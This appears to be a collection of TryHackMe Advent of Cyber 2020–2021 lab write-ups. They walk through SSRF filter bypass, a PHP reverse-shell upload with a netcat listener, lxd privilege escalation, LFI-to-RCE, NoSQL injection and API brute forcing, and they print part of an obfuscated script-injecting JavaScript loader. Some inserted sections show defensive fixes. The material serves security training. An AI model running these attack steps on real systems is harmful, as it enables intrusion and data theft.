- Based on all the information gathered. It's likely that Rudolph is in the Windy City and is staying in a hotel on Magnificent Mile. What are the street numbers of the hotel address?
- `41.891815, -87.624277` on Google Maps
- `Chicago Marriott Downtown` on Google Search
- `540`
### see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-15-There's a Python in my stocking!/README.md
================================================
# There's a Python in my stocking!
- What's the output of True + True?
- `2`
- What's the database for installing other peoples libraries called?
- `PyPi`
- What is the output of bool("False")?
- `True`
- What library lets us download the HTML of a webpage?
- `requests`
- What is the output of the program provided in "Code to analyse for Question 5" in today's material?
(This code is located above the Christmas banner and below the links in the main body of this task)
- `[1, 2, 3, 6]`
- What causes the previous task to output that?
- `pass by reference`
### see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-16-Help! Where is Santa?/README.md
================================================
# Help! Where is Santa?
Oh no! Santa 🎅 has taken off, leaving you -- the faithful elves behind! Can you help find Santa's location?
Santa has a webpage at `<TARGET_IP>/static/index.html`
- What is the port number for the web server?
- `nmap -p -10000 <TARGET_IP>`
- `8000`
- What is the directory for the API, without the API key?
- Visit `http://<TARGET_IP>:8000/` and inspect code
- `/api/`
- Where is Santa right now?
- Change the `TARGET_API` in `api_fuzzer.py`
- `python3 api_fuzzer.py`
- `Winter Wonderland, Hyde Park, London`
- Find out the correct API key. Remember, this is an odd number between 0-100. After too many attempts, Santa's Sled will block you.
To unblock yourself, simply terminate and re-deploy the target instance (<TARGET_IP>)
- `57`
### see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-16-Help! Where is Santa?/api_fuzzer.py
================================================
import requests
TARGET_API = "YOUR_TARGET_IP_HERE"  # replace with the IP of the target instance

# The key is an odd number between 0 and 100, so only odd values are requested.
for i in range(0, 100):
    if i % 2 == 1:
        response = requests.get('http://' + TARGET_API + ':8000/api/{}'.format(str(i)))
        print(str(i) + " : " + str(response.status_code))
        print(response.text)
================================================
FILE: Advent-of-Cyber-2020/Day-17-ReverseELFneering/README.md
================================================
# ReverseELFneering
Username: elfmceager
Password: adventofcyber
Use your new-found knowledge of Radare2 to analyse the "challenge1" file in the Instance <TARGET_IP> that is attached to this task to answer the questions below.
Connect by ssh to the target.
- ssh elfmceager@<TARGET_IP>, type `yes` and enter the password `adventofcyber`.
- What is the value of local_ch when its corresponding movl instruction is called (first if multiple)?
- `./file1`
- `r2 -d ./file1`
- Inside r2> `aa`
- `afl | grep main`
- `pdf @main`
- `1`
- What is the value of eax when the imull instruction is called?
- `db 0x00400b55`
- `pdf @main`
- `dc`
- `px @rbp-0xc`
- `ds`
- `px @rbp-0xc`
- `dr`
- `ds`
- `dr`
- `6`
- What is the value of local_4h before eax is set to 0?
- Play with breakpoints and registers
- `6`
### see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-18-The_Bits_of_Christmas/README.md
================================================
# The Bits of Christmas
Username: `cmnatic`
Password: `Adventofcyber!`
- Open the "TBFC_APP" application in ILspy and begin decompiling the code
- Open `Remmina` on your machine or download it with `sudo apt install remmina`
- Start Remmina, enter the IP, the username and password.
- Open ILSpy, click `File` and open `TBFC_APP`
- What is Santa's password?
- In the root folder we see a lot of contents: functions, libraries, main. Then we find a folder called `CrackMe`. Inside that folder there is the main form code. If you analyse all the code, you see that when the `Submit password` button is pressed it calls the function `buttonActivate_Click`... mmmh. Let's take a look.
- The first function called references a module that includes this `internal static $ArrayType$$$BY0BB@$$CBD ??_C@_0BB@IKKDFEPG@****************@/* Not supported: data(** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **) */;`. :)
- `*************`
- Now that you've retrieved this password, try to login...What is the flag?
- `***{*****}`
### see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-19-The_Naughty_or_Nice_List/README.md
================================================
# The Naughty or Nice List

- Once the VM is deployed, connect to the web app: `http://<TARGET_IP>`
- Enter a name in the form and click the "Search" button. When the page loads, it should tell you whether that name is on the Naughty List or the Nice List. Notice that the URL for the page looks something like this: `http://<TARGET_IP>/?proxy=http%3A%2F%2Flist.hohoho%3A8080%2Fsearch.php%3Fname%3DTib3rius`
- If we use a URL decoder on the value of the "proxy" parameter, we get: `http://list.hohoho:8080/search.php?name=Tib3rius`
- Since "list.hohoho" is not a valid hostname on the Internet (.hohoho is not a top-level domain), this hostname likely refers to some back-end machine. It seems that the web app works by taking this URL, making a request at the back-end, and then returning the result to the front-end web app. If the developer has not been careful, we may be able to exploit this functionality using Server-Side Request Forgery (SSRF).
- The most obvious thing we can try to do first is to fetch the root of the same site. Browse to: `http://<TARGET_IP>/?proxy=http%3A%2F%2Flist.hohoho%3A8080%2F`
- This seems to have potential, as in place of the original "Tib3rius is on the Nice List." message, we instead see "Not Found. The requested URL was not found on this server." This seems like a generic 404 message, indicating that we were able to make the server request the modified URL and return the response.
- There are many things we could do now, such as trying to find valid URLs for the "list.hohoho" site. We could also try changing the port number from 8080 to something else, to see if we can connect to any other services running on the host, even if these services are not web servers.
- Try changing the port number from 8080 to just 80 (the default HTTP port): `http://<TARGET_IP>/?proxy=http%3A%2F%2Flist.hohoho%3A80`
- The message now changes to "Failed to connect to list.hohoho port 80: Connection refused" which suggests that port 80 is not open on list.hohoho.
- Try changing the port number to 22 (the default SSH port): `http://<TARGET_IP>/?proxy=http%3A%2F%2Flist.hohoho%3A22`
- The message now changes to "Recv failure: Connection reset by peer" which suggests that port 22 is open but did not understand what was sent (this makes sense, as sending an HTTP request to an SSH server will not get you anywhere!)
- Enumerating open ports via SSRF can be performed in this manner, by iterating over common ports and measuring the differences between responses. Even in cases where error messages aren't returned, it is often possible to detect which ports are open vs closed by measuring the time each request takes to complete.
- Another thing we can try to do with SSRF is access services running locally on the server. We can do this by replacing the list.hohoho hostname with "localhost" or "127.0.0.1" (among others). Try this now: `http://<TARGET_IP>/?proxy=http%3A%2F%2Flocalhost`
- Oops! It looks like the developer has a check in place for this, as the message returned says "Your search has been blocked by our security team."
- Indeed, if you try other hostnames (e.g. 127.0.0.1, example.com, etc.) they will all be blocked. The developer has implemented a check to ensure that the hostname provided starts with "list.hohoho", and will block any hostnames that don't.
- As it turns out, this check can easily be bypassed. Since the hostname simply needs to start with "list.hohoho", we can take advantage of DNS subdomains and create our own domain "list.hohoho.evilsite.com" which resolves to 127.0.0.1. In fact, we don't even need to buy a domain or configure the DNS, because multiple domains already exist that let us do this. The one we will be using is localtest.me, which resolves every subdomain to 127.0.0.1.
- We can therefore set the hostname in the URL to "list.hohoho.localtest.me", bypass the check, and access local services: `http://<TARGET_IP>/?proxy=http%3A%2F%2Flist.hohoho.localtest.me`
- Success! It appears that there is a web server running locally, and it has a message from Elf McSkidy that contains some sensitive information we can use!
- Click the "Admin" link at the top or scroll down to the login. Guess the username and use the password you found to login as Santa.
- Delete the naughty list to find the challenge flag!
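The bypass works because the proxy only asks whether the hostname *starts with* `list.hohoho`. The block below is an added example (not the room's own code) that puts that flawed rule next to a stricter one: an exact hostname allowlist, a port allowlist, and a check that the name the proxy is about to contact does not resolve to loopback or link-local space. The policy constants and the `fake_resolver` table are assumptions made so the example runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Assumed policy for this example: the proxy may only reach the back-end list service.
ALLOWED_HOSTS = {"list.hohoho"}
ALLOWED_PORTS = {8080}


def _real_resolver(hostname):
    return socket.gethostbyname(hostname)


def weak_check(url):
    """The rule described above: any hostname beginning with list.hohoho passes."""
    host = urlsplit(url).hostname or ""
    return host.startswith("list.hohoho")


def strict_check(url, resolver=_real_resolver):
    """Exact host match, explicit port list, and the resolved address may not be local."""
    try:
        parts = urlsplit(url)
        port = parts.port if parts.port is not None else 80
    except ValueError:                      # malformed port such as http://host:abc
        return False
    if parts.scheme != "http" or parts.hostname not in ALLOWED_HOSTS:
        return False                        # list.hohoho.localtest.me is not list.hohoho
    if port not in ALLOWED_PORTS:
        return False                        # blocks the port-scanning trick (22, 80, ...)
    try:
        addr = ipaddress.ip_address(resolver(parts.hostname))
    except (OSError, ValueError):           # socket.gaierror is an OSError
        return False
    # Even an allowlisted name must not point back at the proxy host itself.
    return not (addr.is_loopback or addr.is_link_local or addr.is_unspecified)


def fake_resolver(hostname):
    """Constructed DNS answers so the example needs no network; list.hohoho is a private back-end."""
    table = {
        "list.hohoho": "10.0.0.5",
        "list.hohoho.localtest.me": "127.0.0.1",
        "localhost": "127.0.0.1",
    }
    if hostname not in table:
        raise socket.gaierror(f"constructed resolver: unknown host {hostname}")
    return table[hostname]


if __name__ == "__main__":
    for candidate in ["http://list.hohoho:8080/search.php?name=Tib3rius",
                      "http://list.hohoho:22",
                      "http://localhost",
                      "http://list.hohoho.localtest.me"]:
        print(f"{candidate:48} weak={weak_check(candidate)!s:5} "
              f"strict={strict_check(candidate, resolver=fake_resolver)}")
```

The last line of `strict_check` matters even with an exact allowlist: if an attacker can influence what `list.hohoho` resolves to, the name alone is no longer proof of where the request goes.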
### see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-20-PowershELlF_to_the_rescue/README.md
================================================
# PowershELlF to the rescue
- Search for the first hidden elf file within the Documents folder. Read the contents of this file. What does Elf 1 want?
- `ssh -l mceager <TARGET_IP>`
- Enter the password `r0ckStar!`
- Run `powershell` and wait until the new prompt appears.
- `Set-Location ./Documents/`
- `Get-ChildItem -File`
- `Get-ChildItem -File -Hidden`
- Notice there is a hidden file `e1fone.txt` and a visible `elfone.txt`.
- `Get-Content elfone.txt`
- `Get-Content e1fone.txt`
- `2 front teeth`
- Search on the desktop for a hidden folder that contains the file for Elf 2. Read the contents of this file. What is the name of that movie that Elf 2 wants?
- `cd ..`
- `Set-Location Desktop`
- `Get-ChildItem -Directory -Hidden`
- `Set-Location .\elf2wo\`
- `Get-Content .\e70smsW10Y4k.txt`
- `Scrooged`
- Search the Windows directory for a hidden folder that contains files for Elf 3. What is the name of the hidden folder? (This command will take a while)
- `Set-Location C:\Windows`
- `Get-ChildItem -Filter "*3*" -Recurse -Directory -Hidden -ErrorAction SilentlyContinue`
- `Set-Location .\System32\3lfthr3e\`
- `3lfthr3e`
- How many words does the first file contain?
- `Get-Content 1.txt | Measure-Object -Word`
- `9999`
- What 2 words are at index 551 and 6991 in the first file?
- `(Get-Content .\1.txt)[551]`
- `(Get-Content .\1.txt)[6991]` or `Get-Content 1.txt | Select-Object -Index 551,6991`
- `Red Ryder`
- This is only half the answer. Search in the 2nd file for the phrase from the previous question to get the full answer. What does Elf 3 want? (use spaces when submitting the answer)
- `Get-Content 2.txt | Select-String -Pattern "redryder"`
- `Red Ryder bb gun`
### see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-21-Time_for_some_ELForensics/README.md
================================================
# Time for some ELForensics
User name: `littlehelper`
User password: `iLove5now!`
Open Remmina and connect to the remote machine.
- Read the contents of the text file within the Documents folder. What is the file hash for db.exe?
- Open PowerShell on the remote machine
- `Set-Location Documents`
- `Get-ChildItem`
- `Get-Content '.\db file hash.txt'`
- `********************856E6A78E3A1`
- What is the file hash of the mysterious executable within the Documents folder?
- `Get-FileHash -Algorithm MD5 deebee.exe`
- `********************6EB12AED09F0`
- Using Strings find the hidden flag within the executable?
- `C:\Tools\strings64.exe -accepteula deebee.exe`
- Read the output carefully
- `THM{*******************************}`
- What is the flag that is displayed when you run the database connector file?
- `Get-Item -Path .\deebee.exe -Stream *`
- `wmic process call create $(Resolve-Path .\deebee.exe:hidedb)`
- `THM{*******************************}`
### see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-22-Elf_McEager_becomes_CyberElf/README.md
================================================
# Elf McEager becomes CyberElf
For Server provide (<TARGET_IP>) as the IP address provided to you for the remote machine. The credentials for the user account are:
- User name: `Administrator`
- User password: `sn0wF!akes!!!`
Let's connect to the remote machine using Remmina.
We'll also use [CyberChef](https://gchq.github.io/CyberChef/).
- What is the password to the KeePass database?
- Open the `dGhlZ3J*******FzaGVyZQ==` folder, then run the KeePass executable and try to enter the password `mceagerrockstar`. Wrong.
- Open CyberChef and try to decode the folder name.
- Put `dGhlZ3J*******FzaGVyZQ==` in the Input panel and add `Magic` to the recipe. It's probably Base64.
- `**************re`
- Let's enter the password inside Keepass.
- What is the encoding method listed as the 'Matching ops'?
- You can see this in the output panel
- `Base64`
- What is the decoded password value of the Elf Server?
- Navigate into Network tab (in Keepass).
- Double click on the unique entry.
- Click on the button to see the password without bullets, read the notes below.
- Paste this in input on CyberChef.
- Use the recipe `From Hex`.
- `********`
- What is the decoded password value for ElfMail?
- Switch Keepass tab to see eMail entries.
- Copy the elfMail password and read the notes.
- `i****;3S*****;a*****;i*******g!`
- Paste this input in CyberChef with recipe `From HTML Entity`.
- `********ng!`
- Decode the last encoded value. What is the flag?
- Switch Keepass tab to see Recycle Bin entries.
- Open the unique entry.
- The password shown in cleartext without bullets is `nothinghere`. Mhh...
- Let's read the notes.
eval(String.fromCharCode(118, 97, 114, 32, 115,44, 32, 49, 49, 53, 44, 32, 53,... [ ... ] ..., 53, 54, 44, 32, 57, 56, 44, 32, 15, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125));
- Put this in the CyberChef Input and use the recipe `From CharCode`, delimiter `comma`, base `10`.
.ar somestring = document.createElement('script'); somestring.type = 'text/javascript'; somestring.async = true;somestring.src = String.fromCharCode(104, 104, 116, 116, 112, ... [ ... ] ..., 22, 97, 47); var alls = document.getElementsByTagName('script'); var nt3 = true; for ( var i = alls.length; i--;) { if (alls[i].src.indexOf(String.fromCharCode(49, 49, 100, 51,... [ ... ] ... 56, 98, 56)) > -1) { nt3 = false;} } if(nt3 == true){document.getElementsByTagName("head")[0].appendChild(somestring); }
- Let's add another rule to the recipe, the same as before. It seems there are things to be evaluated twice.
- `.https://gist.github.com/heavenraiza/1d321244c4**********d9a3298a88b8`
- `THM{********************************}`
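The note is a loader wrapped twice in `String.fromCharCode(...)`, which is why the `From CharCode` recipe step has to be applied a second time. The block below is an added example, not the room's note or CyberChef's code: it does the same peeling in Python, stopping when a pass no longer changes anything, and then pulls out the URL the decoded loader points at. The sample note is constructed with the `to_charcode` helper and its second-stage URL is a placeholder, not the gist address from the room.

```python
import re
from typing import List

# Matches a String.fromCharCode(118, 97, 114, ...) call and captures the number list.
CHARCODE_CALL = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")


def decode_charcode_calls(text: str) -> str:
    """Replace every String.fromCharCode(...) call in text with the string it builds
    (the same transformation as CyberChef's 'From CharCode', comma delimiter, base 10)."""
    def _replace(match):
        codes = [int(c) for c in match.group(1).split(",") if c.strip()]
        return "".join(chr(c) for c in codes)
    return CHARCODE_CALL.sub(_replace, text)


def peel_layers(text: str, max_layers: int = 10) -> List[str]:
    """Decode repeatedly until a pass changes nothing; returns one string per layer removed.
    This is what adding the same recipe rule again does for a doubly wrapped note."""
    layers = []
    current = text
    for _ in range(max_layers):
        decoded = decode_charcode_calls(current)
        if decoded == current:
            break
        layers.append(decoded)
        current = decoded
    return layers


def extract_urls(text: str) -> List[str]:
    """Pull the http(s) URLs out of a decoded loader so they can be looked up or blocked."""
    return re.findall(r"https?://[^\s'\";)]+", text)


def to_charcode(s: str) -> str:
    """Helper used only to build the constructed sample below."""
    return "String.fromCharCode(" + ", ".join(str(ord(ch)) for ch in s) + ")"


# Constructed sample, not the note from the room: a loader that injects a second-stage
# script, wrapped twice in String.fromCharCode like the original. The URL is a placeholder.
STAGE2_URL = "https://example.com/placeholder.js"
INNER_JS = ("var s = document.createElement('script'); s.src = " + to_charcode(STAGE2_URL)
            + "; document.getElementsByTagName('head')[0].appendChild(s);")
SAMPLE_NOTE = "eval(" + to_charcode(INNER_JS) + ");"

if __name__ == "__main__":
    for number, layer in enumerate(peel_layers(SAMPLE_NOTE), start=1):
        print(f"--- layer {number} ---\n{layer}\n")
    print("second-stage URLs:", extract_urls(peel_layers(SAMPLE_NOTE)[-1]))
```

Stopping on "no change" rather than after a fixed number of passes is what makes this safe to run on notes with one, two or more layers; `max_layers` only guards against pathological input.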
### see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-23-The_Grinch_strikes_again!/README.md
================================================
# The Grinch strikes again!

Use Remmina to connect to the target machine as the documentation in the [proper page](https://tryhackme.com/room/adventofcyber2) tells you.
- User name: `administrator`
- User password: `sn0wF!akes!!!`
- Decrypt the fake 'bitcoin address' within the ransom note. What is the plain text value?
- `echo -n "bm9tb3J************pdmFsY29tcGFueQ==" | base64 -d`
- `nomore******************`
- At times ransomware changes the file extensions of the encrypted files. What is the file extension for each of the encrypted files?
- `.grinch`
- What is the name of the suspicious scheduled task?
- `opidsfsdf`
- Inspect the properties of the scheduled task. What is the location of the executable that is run at login?
- `C:\Users\Administrator\Desktop\oidsfsdf.exe`
- There is another scheduled task that is related to VSS. What is the ShadowCopyVolume ID?
- `7a9eea15-000-0000-0000-010000000000`
- Assign the hidden partition a letter. What is the name of the hidden folder?
- `confidential`
- Right-click and inspect the properties for the hidden folder. Use the 'Previous Versions' tab to restore the encrypted file that is within this hidden folder to the previous version. What is the password within the file?
- `*********************`
### see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-24-The_Trial_Before_Christmas/README.md
================================================
# The Trial Before Christmas
- Scan the machine. What ports are open?
- `scilla port -target <TARGET_IP>`, [scilla here](https://github.com/edoardottt/scilla)
- `80, 65000`
- What's the title of the hidden website? It's worthwhile looking recursively at all websites on the box for this step.
- `http://<TARGET_IP>:65000`
- `Light Cycle`
- What is the name of the hidden php page?
- `gobuster dir -u http://<TARGET_IP>:65000 -x .php -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt`
- `uploads.php`
- What is the name of the hidden directory where file uploads are saved?
- `scilla dir -target http://<TARGET_IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt`
- `grid`
- Bypass the filters. Upload and execute a reverse shell.
no answer needed
- Navigate to `http://<TARGET_IP>:65000/uploads.php`
- Download [php-reverse-shell](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php)
- Change the IP from the default to your own IP.
- Upload the file.
- Damn. Invalid file.
- Let's look at the validation.
- Found `assets/js/filter.js`.
~~~javascript
const filter = file => {
    if(["image/png", "image/jpeg", "image/jpg"].indexOf(file.type) < 0){
        return false;
    } else if (["png", "jpeg", "jpg"].indexOf(file.name.split(".").pop()) < 0){
        return false;
    }
    //Let's be honest -- these things are dangerous. May as well always return false ¯\_(ツ)_/¯
    return false;
}
~~~
- This instead in `upload.js`
~~~javascript
const upload = () => {
    let file = uploadInput.files[0];
    if(typeof filter === "function"){
        if(!filter(file)){
            changeMsg("Invalid File Type");
            return;
        }
    }
    // rest of upload() not reproduced in this writeup
}
~~~
- Mhhh...
- And here we are: `accept=".png,.jpg,.jpeg"`
- Rename that file to `rshell.jpg.php`
- We have to prevent the browser from loading `filter.js`.
- We can block it using the Developer Tools (F12) or using Burp.
- *tip* If you are having trouble, clear all the cache/data in the browser.
- Move to `http://<TARGET_IP>:65000/grid/`
- On your machine `nc -lnvp 1234`
- Click on the uploaded file.
- What is the value of the web.txt flag?
- `python3 -c 'import pty;pty.spawn("/bin/bash")'`
- `cat /var/www/web.txt`
- `THM{**************}`
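Everything the upload form checked above (`file.type`, the extension, the `accept` attribute) ran in the browser, so a renamed `rshell.jpg.php` and a blocked `filter.js` were enough to get past it. The block below is an added example, not the room's server code, of the check that has to live on the server instead: only the last extension is considered, the file's leading bytes must match the claimed image type, the client's Content-Type is ignored, and the stored name is generated rather than taken from the client. The policy constants and the sample uploads are constructed.

```python
import os
import secrets
from typing import Optional

# Assumed policy for this example: only real PNG/JPEG images may be stored.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg"}
MAGIC_BYTES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
}


def validate_upload(client_filename: str, data: bytes) -> Optional[str]:
    """Server-side replacement for the client-only check in filter.js.

    Returns the name the file may be stored under, or None when it is rejected.
    The client-supplied Content-Type is deliberately never consulted."""
    base = os.path.basename(client_filename)          # strip any path the client sent
    if "." not in base:
        return None
    extension = base.rsplit(".", 1)[1].lower()        # only the LAST extension counts
    if extension not in ALLOWED_EXTENSIONS:
        return None                                   # rshell.jpg.php ends in .php -> rejected
    if not data.startswith(MAGIC_BYTES[extension]):
        return None                                   # claimed image type must match the bytes
    # Never keep the client's name: a random name with the verified extension.
    return f"{secrets.token_hex(8)}.{extension}"


# Constructed sample uploads (not files from the room).
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"\x00" * 16
PHP_SAMPLE = b"<?php /* constructed sample, not a real payload */ ?>"

if __name__ == "__main__":
    for name, payload in [("photo.png", PNG_SAMPLE), ("rshell.jpg.php", PHP_SAMPLE),
                          ("renamed.jpg", PHP_SAMPLE), ("../../escape.jpeg", JPEG_SAMPLE)]:
        print(f"{name!r:24} -> {validate_upload(name, payload)}")
```

Pair this with a web server configuration that does not execute scripts from the upload directory: the `/grid/` directory above runs `.php` files, so a single gap in validation turns straight into code execution.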
- Upgrade and stabilize your shell.
no answer needed
- See the first command of the previous task (`python3...`).
- Review the configuration files for the webserver to find some useful loot in the form of credentials. What credentials do you find? username:password
- `cd /var/www/TheGrid`
- `ls -alh`
- `cd includes`
- `cat dbauth.php`
- `tron:I****************`
- Access the database and discover the encrypted credentials. What is the name of the database you find these in?
- `mysql -u tron -p`
- Enter the password.
- `show databases;`
- `tron`
- Crack the password. What is it?
- `use tron;`
- `show tables;`
- `select * from users;`
~~~
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | flynn    | ed*********d19a13*********       |
+----+----------+----------------------------------+
~~~
- `hash-identifier`
- [crackstation](https://crackstation.net/)
- `**********`
- Use su to login to the newly discovered user by exploiting password reuse.
no answer needed
- Exit from mysql client with `exit`.
- `su flynn`
- Enter the password
- What is the value of the user.txt flag?
- `cd ~`
- `ls`
- `cat flag.txt`
- `THM{********_****_***********}`
- Check the user's groups. Which group can be leveraged to escalate privileges?
- `id`
- `lxd`
- Abuse this group to escalate privileges to root.
no answer needed
- Check with `lxc image list` on the target machine which images are available locally.
~~~
+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| ALIAS  | FINGERPRINT  | PUBLIC | DESCRIPTION                   | ARCH   | SIZE   | UPLOAD DATE                  |
+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| Alpine | a569b9af4e85 | no     | alpine v3.12 (20201220_03:48) | x86_64 | 3.07MB | Dec 20, 2020 at 3:51am (UTC) |
+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+
~~~
- `lxc init IMAGENAME CONTAINERNAME -c security.privileged=true`
- `lxc config device add CONTAINERNAME DEVICENAME disk source=/ path=/mnt/root recursive=true`
- `lxc start CONTAINERNAME`
- `lxc exec CONTAINERNAME /bin/sh`
- `id`
- What is the value of the root.txt flag?
- `cd /mnt/root/root`
- `THM{***********}`
~~~
"As Elf McEager claimed the root flag a click could be heard as a small chamber on the anterior of the NUC popped open. Inside, McEager saw a small object, roughly the size of an SD card. As a moment, he realized that was exactly what it was. Perplexed, McEager shuffled around his desk to pick up the card and slot it into his computer. Immediately this prompted a window to open with the word 'HOLO' embossed in the center of what appeared to be a network of computers. Beneath this McEager read the following: Thank you for playing! Merry Christmas and happy holidays to all!"
~~~
# Have a nice XMas !!!
================================================
FILE: Advent-of-Cyber-2020/README.md
================================================
# Advent of Cyber 2020 🎄🎅
## [tryhackme.com/edoardottt](https://tryhackme.com/p/edoardottt)

These are all the things I have produced during my Advent of Cyber 2020. I hope you will have as much fun as I had completing this AoC.
Please, before emailing me, be sure you've read the whole introduction part above the questions; it really is a good source for learning new things.

================================================
FILE: Advent-of-Cyber-2021/Day-01-Save_The_Gifts/README.md
================================================
# Day 1 - Save the gifts
The trick is to change the user id until you find the correct one.
- After finding Santa's account, what is their position in the company?
- `*********`
- After finding McStocker's account, what is their position in the company?
- `*************`
- After finding the account responsible for tampering, what is their position in the company?
- `***************`
- What is the received flag when McSkidy fixes the Inventory Management System?
- `THM{*****************}`
- If you want to learn more about IDOR vulnerabilities, we suggest trying out this room https://tryhackme.com/room/idor
No answer needed
- Tasks released each day get progressively harder (but are still guided with walkthrough videos). Come back tomorrow for Day 2's task!
No answer needed
================================================
FILE: Advent-of-Cyber-2021/Day-02-Elf_HR_Problems/README.md
================================================
# Day 2 Elf HR Problems
- Open the static site in a new tab, here.
no answer needed
- Register an account, and verify the cookies using the Developer Tools in your browser.
- What is the name of the new cookie that was created for your account?
- Open the developer tools with F12, go to the Application tab, and look under Cookies.
- `*********`
- What encoding type was used for the cookie value?
- Go to [CyberChef](https://gchq.github.io/CyberChef/), insert the cookie value as input and insert magic as recipe.
- `***********`
- What object format is the data of the cookie stored in?
- `***n`
- Manipulate the cookie and bypass the login portal.
- What is the value of the administrator cookie? (username = admin)
- Go to CyberChef and do the inverse: change the username from yours to 'admin' and apply "To Hex".
- `******************...***************`
- What team environment is not responding?
- `**`
- What team environment has a network warning?
- `**********`
- If you want to learn more about Authentication bypasses, we suggest trying out this room https://tryhackme.com/jr/authenticationbypass
No answer needed
Tasks released each day get progressively harder (but are still guided with walkthrough videos). Come back tomorrow for Day 3's task, where InsiderPHD will be recording a video walkthrough!
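The cookie could be forged because it was nothing but hex-encoded JSON: decode, edit the username, re-encode. The block below is an added example, not the room's application code, that puts that scheme next to the usual fix, an HMAC tag computed with a server-side secret, so that the same edit is rejected by the server. The secret value and the cookie layout (`hex(json) + "." + tag`) are assumptions for the example.

```python
import hashlib
import hmac
import json
from typing import Optional

# Assumption for this example: a server-side secret that is never sent to the browser.
SERVER_SECRET = b"constructed-demo-secret-change-me"


def encode_plain_cookie(username: str) -> str:
    """Hex-encoded JSON, the scheme the writeup describes: readable and editable by anyone."""
    return json.dumps({"username": username}).encode().hex()


def decode_plain_cookie(value: str) -> dict:
    return json.loads(bytes.fromhex(value))


def tamper(value: str, new_username: str) -> str:
    """The 'do the inverse' step from above: decode, swap the name, re-encode."""
    data = decode_plain_cookie(value)
    data["username"] = new_username
    return json.dumps(data).encode().hex()


def encode_signed_cookie(username: str, secret: bytes = SERVER_SECRET) -> str:
    """Same payload, plus an HMAC-SHA256 tag over it: hex(json) + '.' + tag."""
    payload = json.dumps({"username": username}, sort_keys=True).encode().hex()
    tag = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    return payload + "." + tag


def decode_signed_cookie(value: str, secret: bytes = SERVER_SECRET) -> Optional[dict]:
    """Returns the payload only when the tag verifies; any edit to the payload yields None."""
    payload, sep, tag = value.partition(".")
    if not sep:
        return None
    expected = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):    # constant-time comparison
        return None
    try:
        return json.loads(bytes.fromhex(payload))
    except ValueError:                            # bad hex or bad JSON
        return None


if __name__ == "__main__":
    plain = encode_plain_cookie("elf")
    print("plain cookie edited to admin:", decode_plain_cookie(tamper(plain, "admin")))
    signed = encode_signed_cookie("elf")
    payload, tag = signed.split(".")
    print("signed cookie edited to admin:", decode_signed_cookie(tamper(payload, "admin") + "." + tag))
```

Signing stops the edit, but the payload is still readable by the user; if the cookie has to carry something secret, encrypt it as well, or keep the state server-side and hand out only a random session id.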
================================================
FILE: Advent-of-Cyber-2021/Day-03-Christmas_Blackout/README.md
================================================
# Day 3 - Christmas Blackout
- Using a common wordlist for discovering content, enumerate http://MACHINE_IP to find the location of the administrator dashboard. What is the name of the folder?
- `*****`
- In your web browser, try some default credentials on the newly discovered login form for the "administrator" user. What is the password?
- `***************`
- Access the admin panel. What is the value of the flag?
- `********************`
================================================
FILE: Advent-of-Cyber-2021/Day-04-Santas_Running_Behind/README.md
================================================
# Day 4 - Santa's Running Behind
- Access the login form at http://MACHINE_IP
No answer needed
- Configure Burp Suite & Firefox, submit some dummy credentials and intercept the request. Use intruder to attack the login form.
No answer needed
What valid password can you use to access the "santa" account?
- `******`
- What is the flag in Santa's itinerary?
- `***************`
================================================
FILE: Advent-of-Cyber-2021/Day-05-Pesky_Elf_Forum/README.md
================================================
# Day 5 - Pesky Elf Forum
- What flag did you get when you disabled the plugin?
- `*****************`
================================================
FILE: Advent-of-Cyber-2021/Day-06-Patch_Management_Is_Hard/README.md
================================================
# Day 6 - Patch Management Is Hard
- Deploy the attached VM and look around. What is the entry point for our web application?
- `err`
- Use the entry point to perform LFI to read the /etc/flag file. What is the flag?
- `***************************`
- Use the PHP filter technique to read the source code of the index.php. What is the $flag variable's value?
- `***************************`
McSkidy forgot his login credential. Can you help him to login in order to recover one of the server's passwords?
Now that you read the index.php, there is a login credential PHP file's path. Use the PHP filter technique to read its content. What are the username and password?
- `MCSkidy:**********`
- Use the credentials to login into the web application. Help McSkidy to recover the server's password. What is the password of the flag.thm.aoc server?
- `**************************`
- The web application logs all users' requests, and only authorized users can read the log file. Use the LFI to gain RCE via the log file page. What is the hostname of the webserver? The log file location is at ./includes/logs/app_access.log.
- `**************************************`
- Bonus: The current PHP configuration stores the PHP session files in /tmp. Use the LFI to call the PHP session file to get your PHP code executed.
No answer needed
================================================
FILE: Advent-of-Cyber-2021/Day-07-Migration_Without_Security/README.md
================================================
# Day 7 - Migration Without Security
- Interact with the MongoDB server to find the flag. What is the flag?
- `***{********************************}`
We discussed how to bypass login pages as an admin. Can you log into the application that Grinch Enterprise controls as admin and retrieve the flag?
Use the knowledge given in AoC3 day 4 to set up and run the Burp Suite proxy to intercept the HTTP request for the login page. Then modify the POST parameter.
- `***{********************************}`
- Once you are logged in, use the gift search page to list all usernames that have guest roles. What is the flag?
- `***{********************************}`
- Use the gift search page to perform NoSQL injection and retrieve the mcskidy record. What is the details record?
- `*************************************`
================================================
